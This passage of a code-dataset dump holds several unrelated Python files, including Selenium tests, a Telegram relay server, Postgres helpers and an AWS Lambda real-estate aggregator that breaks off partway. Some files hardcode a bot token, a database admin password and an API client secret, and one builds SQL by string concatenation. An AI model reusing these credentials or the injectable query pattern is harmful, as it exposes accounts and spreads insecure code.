\"__main__\":\n inventory = InventroyTest()\n # inventory.set_inv()\n # inventory.get_inv()\n inventory.sell()\n # 
inventory.reback()\n","repo_name":"chuyangc/MicroserviceFreshMall","sub_path":"shop_srv/inventory_srv/tests/inventory.py","file_name":"inventory.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"20623173995","text":"import requests, re\nimport hashlib\nfrom sys import exit\nfrom os.path import isfile\n\nimport argparse\nimport pandas as pd\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\n '-e', '--excel-file',\n help='Name of the cabys Excel file',\n default='cabys.xlsx',\n required=False,\n type=str,\n)\n\nparser.add_argument(\n '-t', '--xlsx-to-plain',\n help='Read the cabys Excel file and convert it to plain text.',\n default='',\n required=False,\n type=str,\n)\n\nparser.add_argument(\n '-D', '--download-cabys',\n default=False,\n action='store_true',\n help='Download the cabys Excel file.',\n)\n\nargs = parser.parse_args()\n\nbase_url=\"https://www.bccr.fi.cr\"\ncabys_url=\"/indicadores-economicos/cat%C3%A1logo-de-bienes-y-servicios\"\n\ndef verify_html(line):\n if 'type=\"hidden\"' in line \\\n or re.search('javascript', line, re.IGNORECASE) \\\n or re.search('noscript', line, re.IGNORECASE) \\\n or 'type=\"text/css\"' in line:\n return False\n\n if len(line) < 8:\n return False\n\n ## The line is correct\n return True\n\n\ndef download_cabys(excel_file):\n session = requests.Session()\n response = session.get(base_url+cabys_url)\n\n #print(str(response.text).strip())\n clean_content = re.sub(\"[\\n\\r]\", '', response.text, flags=re.DOTALL)\n clean_content = re.sub(\"\\t\", ' ', clean_content, flags=re.DOTALL)\n clean_content = re.sub('id=\"[^\"]*\"', ' ', clean_content, flags=re.DOTALL)\n clean_content = re.sub('class=\"[^\"]*\"', ' ', clean_content, flags=re.DOTALL)\n clean_content = re.sub('style=\"[^\"]*\"', ' ', clean_content, flags=re.DOTALL)\n clean_content = re.sub(\" * \", ' ', clean_content, flags=re.DOTALL)\n\n ## Pattern to remove script\n pattern = re.compile(r'<script[^>]*>.*?</script>', re.DOTALL)\n clean_content = re.sub(pattern, '', clean_content)\n\n result = []\n for line in clean_content.split('= query:\n query_data.append(i)\n return query_data\n\n def delete(self, query):\n print(f'The __delete__ method is running - deleting {query}')\n \"\"\"\n Deletes records from the file that match the query,\n as in the select method. 
If an empty dict is passed in query,\n the delete function will not run\n \"\"\"\n if not len(query): return None\n\n with open(self.__data_file, encoding=\"utf-8\") as f:\n data = json.load(f)\n\n count = 0 # counter\n\n for i in data:\n if i.get(list(query.keys())[0]) == list(query.values())[0]:\n del data[count]\n count += 1\n\n with open(self.__data_file, \"w\", encoding=\"utf-8\") as f:\n json.dump(data, f)\n","repo_name":"AleksanderKarn/Parser_HH_SJ_vacancies","sub_path":"connector.py","file_name":"connector.py","file_ext":"py","file_size_in_byte":4160,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"7967842964","text":"from Login import Login\nfrom selenium import webdriver\nimport time\nimport unittest\nclass Test_Login(unittest.TestCase):\n\n beforeScheduleElement=0\n \n @classmethod\n def setUpClass(cls):\n try:\n cls.driver = webdriver.Chrome(\"./chromedriver\")\n except:\n cls.driver = webdriver.Chrome(\"./chromedriver.exe\")\n cls.driver.implicitly_wait(10)\n cls.driver.maximize_window()\n\n def test_01_apply_job_then_add_in_pending_job(self):\n\n driver = self.driver\n #login#\n driver.get(\"http://localhost:3000/login\")\n time.sleep(2)\n driver.find_element_by_id('email').send_keys('teemotest1@gmail.com')\n driver.find_element_by_id('pass').send_keys('123456')\n driver.find_element_by_id('loginBtn').click()\n time.sleep(2)\n #create job#\n\n 
driver.find_elements_by_class_name('MuiButton-label')[-1].click()\n time.sleep(2)\n elif('ALREADY APPLY' == driver.find_elements_by_class_name('MuiButton-label')[-1].text): break\n driver.get('http://localhost:3000/Dashboard')\n time.sleep(2)\n\n # driver.find_elements_by_class_name('MuiButton-label')[new_index].click()\n # time.sleep(2) \n # driver.find_elements_by_class_name('MuiButton-label')[-1].click()\n # time.sleep(2) \n\n driver.get(\"http://localhost:3000/Schedule\")\n time.sleep(2)\n\n print(len(driver.find_elements_by_class_name('MuiListItemText-root')),' elements')\n afterElement = len(driver.find_elements_by_class_name('MuiListItemText-root'))\n print(beforeElement,' ',type(beforeElement) )\n beforeElement=int(beforeElement)+1\n afterElement=int(afterElement)\n print('before=',beforeElement,'after=',afterElement)\n assert beforeElement == afterElement\n time.sleep(2)\n #logout# \n driver.find_element_by_id('logout').click()\n\n print('Finish1')\n\n def test_02_accept_job_then_add_in_schedule(self):\n #login and accept# \n\n driver = self.driver\n driver.get(\"http://localhost:3000/login\")\n time.sleep(2)\n\n driver.find_element_by_id('email').send_keys('teemotest1@gmail.com')\n\n driver.find_element_by_id('pass').send_keys('123456')\n\n driver.find_element_by_id('loginBtn').click()\n time.sleep(2)\n \n driver = self.driver\n\n driver.get(\"http://localhost:3000/JobOwned\")\n time.sleep(2)\n\n driver.find_elements_by_class_name('MuiButton-label')[10].click()\n time.sleep(2)\n\n driver.find_elements_by_class_name('MuiListItemText-root')[10].click()\n time.sleep(1)\n\n # driver.find_elements_by_class_name('MuiButton-label')[10].click()\n # time.sleep(2)\n\n\n driver.get(\"http://localhost:3000/JobOwned\")\n time.sleep(2)\n\n driver.find_elements_by_class_name('MuiButton-label')[10].click()\n time.sleep(2)\n\n driver.find_elements_by_class_name('MuiListItemText-root')[9].click()\n time.sleep(2)\n\n driver.find_element_by_id('customized-menu').click()\n driver.find_element_by_class_name('acceptBtn').click()\n time.sleep(2)\n\n driver.find_elements_by_class_name('MuiButton-label')[10].click()\n time.sleep(2)\n\n driver.find_elements_by_class_name('MuiListItemText-root')[10].click()\n time.sleep(1)\n driver.get(\"http://localhost:3000/Dashboard\")\n time.sleep(1)\n #logout# \n driver.find_element_by_id('logout').click()\n\n #login# \n driver.get(\"http://localhost:3000/login\")\n time.sleep(2)\n driver.find_element_by_id('email').send_keys('teemotest2@gmail.com')\n driver.find_element_by_id('pass').send_keys('123456')\n driver.find_element_by_id('loginBtn').click()\n time.sleep(2)\n #count accept job in schedule# \n\n driver.get(\"http://localhost:3000/Schedule\")\n time.sleep(2)\n\n print(len(driver.find_elements_by_class_name('rbc-event-content')),'schedule elements')\n afterScheduleElement = len(driver.find_elements_by_class_name('rbc-event-content'))\n time.sleep(2)\n self.beforeScheduleElement=int(self.beforeScheduleElement)+1\n afterScheduleElement=int(afterScheduleElement)\n print('beforeScheduleElement=',self.beforeScheduleElement,'afterScheduleElement=',afterScheduleElement)\n assert self.beforeScheduleElement == afterScheduleElement\n time.sleep(2)\n #logout# \n driver.find_element_by_id('logout').click()\n\n #Delete new job# \n driver = self.driver\n driver.get(\"http://localhost:3000/login\")\n time.sleep(2)\n\n driver.find_element_by_id('email').send_keys('teemotest1@gmail.com')\n\n driver.find_element_by_id('pass').send_keys('123456')\n\n 
driver.find_element_by_id('loginBtn').click()\n time.sleep(2)\n\n driver.get(\"http://localhost:3000/JobOwned\")\n time.sleep(2)\n\n driver.find_elements_by_class_name('MuiButton-label')[10].click()\n time.sleep(2)\n\n print(len(driver.find_elements_by_class_name('MuiListItemText-root')))\n driver.find_elements_by_class_name('MuiListItemText-root')[7].click()\n time.sleep(5) \n\n print('Finish2')\n\n\n\n @classmethod\n def tearDownClass(cls):\n cls.driver.close()\n cls.driver.quit()\n print(\"complete\")\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"2110423-2019-2/sec33_Leelulila","sub_path":"end2end_testing/Test_Schedule.py","file_name":"Test_Schedule.py","file_ext":"py","file_size_in_byte":8528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21023647823","text":"from datetime import date\n\nfrom sqlalchemy import and_, func, select\n\nfrom app.bookings.models import Bookings\nfrom app.dao.base import BaseDAO\nfrom app.database import async_session_maker\nfrom app.hotels.models import Hotels\nfrom app.hotels.rooms.models import Rooms\n\n\nclass HotelDAO(BaseDAO):\n model = Hotels\n\n @classmethod\n async def get_all(cls, location: str, date_from: date, date_to: date):\n async with async_session_maker() as session:\n booked_hotels = (\n select(func.count(Bookings.id).label(\"booked\"), Rooms.hotel_id)\n .join(Rooms, Rooms.id == Bookings.room_id, isouter=True)\n .where(\n and_(\n Bookings.date_from <= date_to,\n Bookings.date_to >= date_from,\n )\n )\n .group_by(Rooms.hotel_id)\n .cte(\"booked_hotels\")\n )\n\n get_hotels = (\n select(\n Hotels.id,\n Hotels.name,\n Hotels.location,\n Hotels.services,\n Hotels.rooms_quantity,\n Hotels.image_id,\n (\n Hotels.rooms_quantity - func.coalesce(booked_hotels.c.booked, 0)\n ).label(\"rooms_left\"),\n )\n .select_from(Hotels)\n .join(\n booked_hotels, booked_hotels.c.hotel_id == Hotels.id, isouter=True\n )\n .where(\n and_(\n Hotels.rooms_quantity - func.coalesce(booked_hotels.c.booked, 0)\n > 0,\n Hotels.location.like(f\"%{location}%\"),\n )\n )\n )\n hotels = await session.execute(get_hotels)\n return hotels.mappings().all()\n","repo_name":"ejina21/pet_project","sub_path":"app/hotels/dao.py","file_name":"dao.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5555902949","text":"import nltk\nimport lightrdf\n\nTEXT_FILE = 'computer-science.txt'\nCREATED_FILE = 'created-file.txt'\nONTOLOGY_FILE = 'ontology.owl'\nONTOLOGY_CHECK_FILE = 'ontology-check-file.txt'\n\n\ndef check_for_ontology(phrase):\n words_list = nltk.word_tokenize(phrase)\n if check_if_is_compatible(phrase):\n with open(ONTOLOGY_FILE, \"rb\") as file_in:\n doc = lightrdf.RDFDocument(file_in, parser=lightrdf.xml.PatternParser, base_iri=None)\n\n for word in words_list:\n for triple in doc.search_triples(None, None, None):\n if triple[2].endswith(\"/\" + word):\n return True\n elif triple[2].endswith(\"#\" + word):\n return True\n\n return False\n\n\ndef check_if_is_compatible(phrase):\n words_list = nltk.word_tokenize(phrase)\n pos_map = nltk.pos_tag(words_list)\n i = 0\n j = 0\n k = 0\n ok1 = False\n ok2 = False\n ok3 = False\n for pos in pos_map:\n if (\"NN\" in pos[1]) and ok1 == False:\n ok1 = True\n i += 1\n break\n else:\n i += 1\n\n for j in range(i, len(pos_map)):\n if (\"VB\" in pos_map[j][1]) and ok2 == False and ok1 == True:\n ok2 = True\n j += 1\n break\n else:\n j += 1\n\n for K in range(j, 
len(pos_map)):\n # index with the loop variable K; the old manual counter k restarted from 0 instead of j\n if (\"NN\" in pos_map[K][1]) and ok3 == False and ok2 == True and ok1 == True:\n ok3 = True\n break\n\n return ok1 and ok2 and ok3\n\n\nif __name__ == '__main__':\n # with open(TEXT_FILE, \"r\", encoding=\"mbcs\") as in_file:\n # text = in_file.read()\n # sentences = nltk.sent_tokenize(text)\n #\n # created_file = open(CREATED_FILE, \"w\", encoding=\"mbcs\")\n # for sentence in sentences:\n # if check_if_is_compatible(sentence):\n # created_file.write(sentence)\n # created_file.write('\\n')\n\n with open(CREATED_FILE, \"r\", encoding=\"mbcs\") as in_file:\n text = in_file.read()\n sentences = nltk.sent_tokenize(text)\n\n ontology_check_file = open(ONTOLOGY_CHECK_FILE, \"w\", encoding=\"mbcs\")\n for sentence in sentences:\n if check_for_ontology(sentence):\n ontology_check_file.write(sentence)\n ontology_check_file.write('\\n')\n","repo_name":"NarcisSt/IA-Laboratories","sub_path":"lab8/lab8cd.py","file_name":"lab8cd.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34078107391","text":"import os\nimport uuid\nimport sys\nimport argparse\nimport pandas as pd\nfrom psims.mzml.writer import MzMLWriter\nimport pymzml\n\ndef convert_agilent(input_filename, output_filename, msconvert_bin):\n scan_current = 1\n previous_ms1_scan = 0\n\n temp_mzML = os.path.join(os.path.dirname(output_filename), \"{}.mzML\".format(str(uuid.uuid4())))\n\n with MzMLWriter(open(temp_mzML, 'wb'), close=True) as out:\n # Add default controlled vocabularies\n out.controlled_vocabularies()\n # Open the run and spectrum list sections\n with out.run(id=\"my_analysis\"):\n with out.spectrum_list(count=1):\n #spectrum_count = len(scans) + sum([len(products) for _, products in scans])\n run = pymzml.run.Reader(input_filename)\n for spectrum in run:\n if spectrum['ms level'] == 1:\n out.write_spectrum(\n spectrum.mz, spectrum.i,\n id=\"scan={}\".format(scan_current), params=[\n \"MS1 Spectrum\",\n {\"ms level\": 1},\n {\"total ion current\": sum(spectrum.i)}\n ],\n scan_start_time=spectrum.scan_time_in_minutes())\n previous_ms1_scan = scan_current\n scan_current += 1\n elif spectrum[\"ms level\"] == 2:\n precursor_spectrum = spectrum.selected_precursors[0]\n precursor_mz = precursor_spectrum[\"mz\"]\n precursor_intensity = 0\n precursor_charge = 0\n\n try:\n precursor_charge = precursor_spectrum[\"charge\"]\n precursor_intensity = precursor_spectrum[\"i\"]\n except:\n pass\n\n out.write_spectrum(\n spectrum.mz, spectrum.i,\n id=\"scan={}\".format(scan_current), params=[\n \"MSn Spectrum\",  # MS2 scans were mislabeled \"MS1 Spectrum\"\n {\"ms level\": 2},\n {\"total ion current\": sum(spectrum.i)}\n ],\n # Include precursor information\n precursor_information={\n \"mz\": precursor_mz,\n \"intensity\": precursor_intensity,\n \"charge\": precursor_charge,\n \"scan_id\": \"scan={}\".format(previous_ms1_scan),\n \"activation\": [\"beam-type collisional dissociation\", {\"collision energy\": spectrum[\"collision energy\"]}]\n },\n scan_start_time=spectrum.scan_time_in_minutes())\n\n scan_current += 1\n\n # Reconvert with msconvert\n cmd = '{} {} --32 --zlib --ignoreUnknownInstrumentError \\\n --outdir {} --outfile {}'.format(msconvert_bin, temp_mzML, os.path.dirname(output_filename), os.path.basename(output_filename))\n print(cmd)\n os.system(cmd)\n\n # remove temp file\n os.remove(temp_mzML)\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Test write out a file.')\n parser.add_argument('input_filename')\n 
parser.add_argument('output_filename')\n parser.add_argument('--msconvert_bin', default='msconvert')\n\n args = parser.parse_args()\n\n convert_agilent(args.input_filename, args.output_filename, args.msconvert_bin)\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"Wang-Bioinformatics-Lab/Agilent_Conversion_Workflow","sub_path":"bin/convert_agilent.py","file_name":"convert_agilent.py","file_ext":"py","file_size_in_byte":3670,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"16299978150","text":"import config\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom skimage.io import imread\nfrom skimage.morphology import binary_opening, disk, label\n\n\ndef rle_decode(mask_rle, shape=(768, 768)):\n '''\n mask_rle: run-length as string formated (start length)\n shape: (height,width) of array to return \n Returns numpy array, 1 - mask, 0 - background\n '''\n s = mask_rle.split()\n starts, lengths = [np.asarray(x, dtype=int) for x in (s[0:][::2], s[1:][::2])]\n starts -= 1\n ends = starts + lengths\n img = np.zeros(shape[0]*shape[1], dtype=np.uint8)\n for lo, hi in zip(starts, ends):\n img[lo:hi] = 1\n return img.reshape(shape).T # Needed to align to RLE direction\n\ndef masks_as_image(in_mask_list):\n # Take the individual ship masks and create a single mask array for all ships\n all_masks = np.zeros((768, 768), dtype = np.uint8)\n for mask in in_mask_list:\n if isinstance(mask, str):\n all_masks |= rle_decode(mask)\n return all_masks\n","repo_name":"Andrii-Radyhin/Airbus-Ship-Detection-Challenge","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"45332825436","text":"\nimport connection\n\n\n\ndef getConn():\n c = connection.conn()\n return c\n\ndef closeConnection(connection,cursor):\n if connection:\n cursor.close()\n connection.close()\n\n\n'''Insert a telegram user if it doesnt exist\n Return True if user has been inserted successfully, False otherwise\n'''\ndef insertUser(tid, name, surname, status='P', admin=False ):\n if getUserByTid(tid):\n return False\n \n connection = getConn()\n cursor = connection.cursor()\n \n\n postgres_insert_query = \"\"\" INSERT INTO users (tid, username, surname, status, user_admin) VALUES (%s,%s,%s,%s,%s)\"\"\"\n record_to_insert = (tid, name, surname, status, admin)\n cursor.execute(postgres_insert_query, record_to_insert)\n\n connection.commit()\n count = cursor.rowcount\n\n closeConnection(connection,cursor)\n\n if count <1:\n return False\n print(count, \"Record inserted successfully into users table\")\n return True\n\n\n# Returns all the user registered on bot\ndef getUsers():\n connection = getConn()\n cursor = connection.cursor()\n\n postgreSQL_select_Query = \"select users.tid from users\"\n \n cursor.execute(postgreSQL_select_Query)\n publisher_records = cursor.fetchall()\n closeConnection(connection,cursor)\n return publisher_records\n\n''' Gets the user by telegram id '''\ndef getUserByTid(tid):\n connection = getConn()\n cursor = connection.cursor()\n\n postgreSQL_select_Query = \"select * from users where tid=\" + str(tid)\n \n cursor.execute(postgreSQL_select_Query)\n publisher_records = cursor.fetchall()\n\n closeConnection(connection,cursor)\n return publisher_records\n # if not publisher_records:\n # return False\n # else:\n # return True \n \n\ndef approveUser(tid):\n\n alreadyApproved = 
getUserByTid(tid)\n connection = getConn()\n cursor = connection.cursor()\n\n postgreSQL_update_Query = \"UPDATE users SET status = 'A' WHERE tid = %s\"\n \n cursor.execute(postgreSQL_update_Query, (tid,))\n connection.commit()\n count = cursor.rowcount\n print(count, \"Record updated successfully \")\n closeConnection(connection,cursor)\n return count > 0, alreadyApproved\n\n\n# insertUser(22222, 'boh','bah')\n#getUsers()\n# if getUserByTid(145645559):\n# print(getUserByTid(145645559)[0][3])\n\n","repo_name":"TomasMali/Ticket","sub_path":"conn/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19818568097","text":"import recieving_server\nimport sending_server\nimport threading\nimport requests\nfrom time import sleep\n\n\ndef receiving_thread():\n receiving_server_thread = threading.Thread(target=recieving_server.main)\n receiving_server_thread.start()\n\n\ndef sending_thread():\n sending_server_thread = threading.Thread(target=sending_server.main)\n sending_server_thread.start()\n# recieving_server.GLOBAL_QUEUE > sending_server.LIST_MASSAGES\n\n\n# def queue_to_list_check():\n# while True:\n# queue_new_msg = recieving_server.GLOBAL_QUEUE.get()\n# recieving_server.msg_file_save(queue_new_msg)\n# sending_server.LIST_MASSAGES.append(queue_new_msg)\n\ndef telegram_client_msg_receiving():\n last_message_id = 0\n token = \"1698512750:AAHYWLH6sdTi6kIVJbTBpqjrBneZgt9rS8w\"\n url = f'https://api.telegram.org/bot{token}/getUpdates'\n\n while True:\n response = requests.post(url)\n for message in response.json()[\"result\"]:\n if last_message_id != 0 and last_message_id >= message['message']['message_id']:\n continue\n\n sending_server.LIST_MASSAGES.append(message[\"message\"][\"text\"])\n\n last_message_id = message['message']['message_id']\n\n sleep(5)\n\n\n\ndef queue_thread():\n queue_thread_start = threading.Thread(target=telegram_client_msg_receiving)\n queue_thread_start.start()\n\n\ndef main():\n queue_thread()\n receiving_thread()\n sending_thread()\n input(\"Press any key to stop the server \")\n\n\nif __name__ == '__main__':\n main()","repo_name":"xErikx/1st-project","sub_path":"main_server.py","file_name":"main_server.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30466155766","text":"from django.urls import path\n\nfrom . 
import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('transcript_interact/', views.process_transcript, name='transcript_interact'),\n path('transcript/', views.get_data_from_post, name='transcript'),\n path('wiki-interaction/', views.Process_Wiki_Request, name='wiki-interaction'),\n path('gpt-interaction/', views.Process_GPT_Request, name='gpt-interaction'),\n]\n","repo_name":"gonglk/transcribing_deepgram","sub_path":"transcript/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"923540113","text":"import requests as req\nimport sys\nimport logging\nimport pymysql\nimport datetime\nimport statistics\nimport heapq\nfrom random import randint\n\ndef lambda_handler(event, context):\n rds_host = \"sevenlendingdb.cvnlc8wxkgyn.us-east-2.rds.amazonaws.com\"\n name = \"admin\"\n password = \"123qweQWE\"\n db_name = \"N7Lending\"\n\n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n\n try:\n conn = pymysql.connect(host=rds_host, user=name, passwd=password, db=db_name, connect_timeout=5)\n except pymysql.MySQLError as e:\n logger.error(\"ERROR: Unexpected error: Could not connect to MySQL instance.\")\n logger.error(e)\n sys.exit()\n\n logger.info(\"SUCCESS: Connection to RDS MySQL instance succeeded\")\n\n # Logic Code Starts Here\n\n client_id = '16p7n5khh0hvmb2146mj8iggoc'\n client_secret = 'cv9djs2b2s85bp2t4f2ummcn5nhm0l2dmrjq0ilvsm3jod2sf6s'\n\n token_url = 'https://authenticate.constellation1apis.com/oauth2/token'\n\n d = {\"client_id\": client_id, \"client_secret\": client_secret, \"grant_type\": \"client_credentials\"}\n\n r = req.post(token_url, data=d).json()\n\n access_token = r['access_token']\n header = 'Bearer ' + access_token\n hz = {'Authorization': header}\n \n one_YearAgo_Today = datetime.datetime.now() - datetime.timedelta(days=365)\n z_ = str(one_YearAgo_Today.strftime('%Y-%m-%d')) + \"T\" + \"00:00:00\" + \"Z\"\n\n top_ = str(1)\n url2_ = 'https://listings.constellation1apis.com/OData/Property?$top=' + top_ + '&$ignorenulls=true&$filter=OnMarketTimestamp%20ge%20' + z_ + '%20and%20OriginatingSystemName%20eq%20%27REColorado%27%20and%20StandardStatus%20eq%20%27Closed%27&$select=OffMarketTimestamp'\n url2_pikes_ = 'https://listings.constellation1apis.com/OData/Property?$top=' + top_ + '&$ignorenulls=true&$filter=OnMarketTimestamp%20ge%20' + z_ + '%20and%20OriginatingSystemName%20eq%20%27PikesPeak%27%20and%20StandardStatus%20eq%20%27Closed%27&$select=OffMarketTimestamp'\n\n\n url_ = 'https://listings.constellation1apis.com/OData/Property?$top=' + top_ + '&$ignorenulls=true&$filter=OnMarketTimestamp%20ge%20' + z_ + '%20and%20OriginatingSystemName%20eq%20%27REColorado%27%20and%20StandardStatus%20eq%20%27Active%27&$select=PostalCode'\n url_pikes_ = 'https://listings.constellation1apis.com/OData/Property?$top=' + top_ + '&$ignorenulls=true&$filter=OnMarketTimestamp%20ge%20' + z_ + '%20and%20OriginatingSystemName%20eq%20%27PikesPeak%27%20and%20StandardStatus%20eq%20%27Active%27&$select=PostalCode'\n\n response2_ = req.get(url2_, headers=hz, timeout=60, stream=True).json() # Get Closed Properties\n response2_pikes_ = req.get(url2_pikes_, headers=hz, timeout=60, stream=True).json() # Get Closed Properties\n \n response_ = req.get(url_, headers=hz, timeout=60, stream=True).json() # Get Active Properties\n response_pikes_ = req.get(url_pikes_, headers=hz, timeout=60, stream=True).json() # Get Active Properties\n \n total_units_sold_ 
= int(response2_['@odata.totalCount']) + int(response2_pikes_['@odata.totalCount'])\n total_units_open_ = int(response_['@odata.totalCount']) + int(response_pikes_['@odata.totalCount'])\n \n t1 = str(one_YearAgo_Today.strftime('%Y-%m-%d'))\n t = datetime.datetime.now()\n t2 = str(t.strftime('%Y-%m-%d'))\n time_period = \"From \" + str(t1) + ' To ' + str(t2)\n \n with conn.cursor() as cur:\n cur.execute(\"DELETE FROM raw_data_open_properties\")\n cur.execute(\"DELETE FROM raw_data_closed_properties\")\n conn.commit()\n \n prices = [0]\n dictionary = {}\n postal_codes = {}\n \n \n for d in range(366):\n oneYearAgoToday = datetime.datetime.now() - datetime.timedelta(days=d)\n one_day_later = datetime.datetime.now() - datetime.timedelta(days=(d - 1))\n t = datetime.datetime.now()\n today = str(t.strftime('%Y-%m-%d')) + \"T\" + \"00:00:00\" + \"Z\"\n\n z = str(oneYearAgoToday.strftime('%Y-%m-%d')) + \"T\" + \"00:00:00\" + \"Z\"\n zg = str(one_day_later.strftime('%Y-%m-%d')) + \"T\" + \"00:00:00\" + \"Z\"\n\n top = str(500000)\n\n query = 'OnMarketTimestamp,ListPrice,PostalCode,OriginatingSystemName,ListAgentEmail,ListAgentFullName,ListAgentPreferredPhone,StandardStatus,ListingId'\n \n url = 'https://listings.constellation1apis.com/OData/Property?$top=' + top + '&$ignorenulls=true&$filter=OnMarketTimestamp%20gt%20' + z + '%20and%20OnMarketTimestamp%20le%20' + zg + '%20and%20OriginatingSystemName%20eq%20%27REColorado%27%20and%20StandardStatus%20eq%20%27Active%27&$select=' + query\n\n url2 = 'https://listings.constellation1apis.com/OData/Property?$top=' + top + '&$ignorenulls=true&$filter=OnMarketTimestamp%20gt%20' + z + '%20and%20OnMarketTimestamp%20le%20' + zg + '%20and%20OriginatingSystemName%20eq%20%27REColorado%27%20and%20StandardStatus%20eq%20%27Closed%27&$select=OffMarketTimestamp,' + query\n\n url_pikes = 'https://listings.constellation1apis.com/OData/Property?$top=' + top + '&$ignorenulls=true&$filter=OnMarketTimestamp%20gt%20' + z + '%20and%20OnMarketTimestamp%20le%20' + zg + '%20and%20OriginatingSystemName%20eq%20%27PikesPeak%27%20and%20StandardStatus%20eq%20%27Active%27&$select=' + query\n\n url2_pikes = 'https://listings.constellation1apis.com/OData/Property?$top=' + top + '&$ignorenulls=true&$filter=OnMarketTimestamp%20gt%20' + z + '%20and%20OnMarketTimestamp%20le%20' + zg + '%20and%20OriginatingSystemName%20eq%20%27PikesPeak%27%20and%20StandardStatus%20eq%20%27Closed%27&$select=OffMarketTimestamp,' + query\n\n \n\n response = req.get(url, headers=hz, timeout=60, stream=True).json() # Get Active Properties\n\n response2 = req.get(url2, headers=hz, timeout=60, stream=True).json() # Get Closed Properties\n\n response_pikes = req.get(url_pikes, headers=hz, timeout=60, stream=True).json() # Get Active Properties\n\n response2_pikes = req.get(url2_pikes, headers=hz, timeout=60, stream=True).json() # Get Closed Properties\n\n # Logic Code Ends Here\n\n # Declaration Of Variables Starts Here\n open_response_colorado = response['value']\n #l_id = 'NULL'\n l_status = 'NULL'\n l_postal_code = 'NULL'\n l_realtor_name = 'NULL'\n l_listing_price = 'NULL'\n l_listing_date = 'NULL'\n\n closed_response_colorado = response2['value']\n #l2_id = 'NULL'\n l2_status = 'NULL'\n l2_postal_code = 'NULL'\n l2_realtor_name = 'NULL'\n l2_listing_price = 'NULL'\n l2_listing_date = 'NULL'\n l2_closing_date = 'NULL'\n\n open_response_pikes = response_pikes['value']\n #p_id = 'NULL'\n p_status = 'NULL'\n p_postal_code = 'NULL'\n p_realtor_name = 'NULL'\n p_listing_price = 'NULL'\n p_listing_date = 'NULL'\n\n 
closed_response_pikes = response2_pikes['value']\n #p2_id = 'NULL'\n p2_status = 'NULL'\n p2_postal_code = 'NULL'\n p2_realtor_name = 'NULL'\n p2_listing_price = 'NULL'\n p2_listing_date = 'NULL'\n p2_closing_date = 'NULL'\n\n # total_open_properties = int(response['@odata.totalCount']) + int(response_pikes['@odata.totalCount'])\n # total_closed_properties = int(response2['@odata.totalCount']) + int(response2_pikes['@odata.totalCount'])\n\n # Declaration Of Variables Ends Here\n with conn.cursor() as cur:\n # cur.execute(\"create table results (date_inserted varchar(255) NOT NULL, time_period varchar(255), average_price varchar(255), median_price varchar(255), total_units_sold varchar(255), postal_code_1 varchar(255), postal_code_2 varchar(255), postal_code_3 varchar(255), postal_code_4 varchar(255), postal_code_5 varchar(255), realtor_1 varchar(255), realtor_2 varchar(255), realtor_3 varchar(255), realtor_4 varchar(255), realtor_5 varchar(255), PRIMARY KEY (date_inserted))\")\n # cur.execute(\"create table raw_data_open_properties (ListingId varchar(255) not NULL, status varchar(255), postal_code varchar(255), realtor_name varchar(255), listing_price varchar(255), total_open_properties varchar(255), Listing_Date varchar(255), PRIMARY KEY (ListingId))\")\n # cur.execute(\"create table raw_data_closed_properties (ListingId varchar(255) not NULL, status varchar(255), postal_code varchar(255), realtor_name varchar(255), listing_price varchar(255), total_closed_properties varchar(255), Listing_Date varchar(255), Selling_Date varchar(255), PRIMARY KEY (ListingId))\")\n ins = 'insert ignore into results (date_inserted, time_period, average_price, median_price, total_units_sold, postal_code_1, postal_code_2, postal_code_3, postal_code_4, postal_code_5, realtor_1, realtor_2, realtor_3, realtor_4, realtor_5) values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)'\n ins_open = 'insert ignore into raw_data_open_properties (ListingId, status, postal_code, realtor_name, listing_price, total_open_properties, Listing_Date) values(%s,%s,%s,%s,%s,%s,%s)'\n ins_closed = 'insert ignore into raw_data_closed_properties (ListingId, status, postal_code, realtor_name, listing_price, total_closed_properties, Listing_Date, Selling_Date) values(%s,%s,%s,%s,%s,%s,%s,%s)'\n\n # cur.execute(\"DELETE FROM raw_data_open_properties\")\n # cur.execute(\"DELETE FROM raw_data_closed_properties\")\n\n for i in range(len(open_response_colorado)):\n try:\n # for open properties in ReColorado\n l_id = open_response_colorado[i]['ListingId']\n if 'StandardStatus' in open_response_colorado[i]:\n l_status = open_response_colorado[i]['StandardStatus']\n if 'PostalCode' in open_response_colorado[i]: \n l_postal_code = open_response_colorado[i]['PostalCode']\n postal=open_response_colorado[i]['PostalCode']\n if postal not in postal_codes:\n postal_codes[postal] = 1\n elif postal in postal_codes:\n postal_codes[postal] += 1\n if 'ListAgentFullName' in open_response_colorado[i]: \n l_realtor_name = open_response_colorado[i]['ListAgentFullName']\n agent=open_response_colorado[i]['ListAgentFullName']\n if agent not in dictionary:\n dictionary[agent] = 1\n elif agent in dictionary:\n dictionary[agent] += 1\n 